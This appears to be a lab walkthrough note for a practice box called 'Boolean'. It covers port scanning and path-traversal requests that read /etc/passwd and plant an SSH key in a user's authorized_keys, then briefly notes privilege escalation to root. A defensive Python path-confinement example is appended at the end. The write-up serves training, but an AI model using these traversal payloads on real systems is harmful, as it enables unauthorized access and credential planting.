WDavid404 / PG-Box

PG box walkthrough note

Boolean (Intermediate) #31

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago
PORT      STATE  SERVICE REASON         VERSION
22/tcp    open   ssh     syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

80/tcp    open   http    syn-ack ttl 61
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
.....
| http-title: Boolean
|_Requested resource was http://192.168.203.231/login

33017/tcp open   http    syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Development
|_http-server-header: Apache/2.4.38 (Debian)

Register a new user and log in, confirm the email info

--> Add confirmed

Refresh the web browser, and we get a file manager page.

We can upload a PHP reverse file, but where to call it?

ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.203.231/FUZZ -b "_boolean_session=P9L7IBVIpmr.. ( login session ).....
--> didn't find useful info

Try LFI: /?cwd=../../../../../../etc&file=passwd&download=false -->
root:x:0:0:root:/root:/bin/bash
remi:x:1000:1000::/home/remi:/bin/bash

Go to /?cwd=../../../../../../home/remi/.ssh&file=&download=false and upload our pub key (under ~/.ssh dir) as authorized_keys

So we can ssh to the host as remi: ssh -i ~/.ssh/id_ed25519 remi@192.168.203.231

PE

linpeas

--> ssh -i root root@127.0.0.1 (Run ssh-add -D when you meet the message "Received disconnect from 123.456.78.901 port 22:2: Too many authentication failures Disconnected from 123.456.78.901 port 22")
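
Added example, not part of the original note and not the target application's code: the root cause of the `cwd`/`file` step above is that the file manager joins user-supplied path parts onto its base directory without checking where the result lands. The sketch below shows the server-side confinement check that rejects those requests; the function names, the temporary root directory and the sample requests are assumptions constructed for illustration.

```python
import os
import tempfile

class PathEscape(Exception):
    """Raised when a requested path resolves outside the file-manager root."""

def resolve_in_root(root, cwd, filename=""):
    """Join user-supplied cwd/file onto root and confirm the result stays inside root."""
    # realpath() collapses '..' segments and follows symlinks, so the check is made
    # on the location the OS would actually open, not on the raw request string.
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, cwd, filename))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathEscape(f"{cwd!r} / {filename!r} resolves outside {root_real}")
    return candidate

def check_requests(root, requests):
    """Return (cwd, file, verdict) for each (cwd, file) pair."""
    results = []
    for cwd, filename in requests:
        try:
            resolve_in_root(root, cwd, filename)
            verdict = "allowed"
        except PathEscape:
            verdict = "rejected"
        results.append((cwd, filename, verdict))
    return results

# Constructed sample requests: two ordinary ones, the two cwd values from the
# note above, an absolute cwd, and a traversal hidden behind a valid prefix.
SAMPLE_REQUESTS = [
    ("", "notes.txt"),
    ("docs", "report.pdf"),
    ("../../../../../../etc", "passwd"),
    ("../../../../../../home/remi/.ssh", "authorized_keys"),
    ("/etc", "passwd"),
    ("docs/../..", ""),
]

def demo():
    """Run the sample requests against a throwaway root directory."""
    with tempfile.TemporaryDirectory() as root:
        return check_requests(root, SAMPLE_REQUESTS)

if __name__ == "__main__":
    for row in demo():
        print(row)
```

The same check has to guard uploads as well as downloads and listings, since the write to `.ssh/authorized_keys` in the note goes through the same `cwd` parameter.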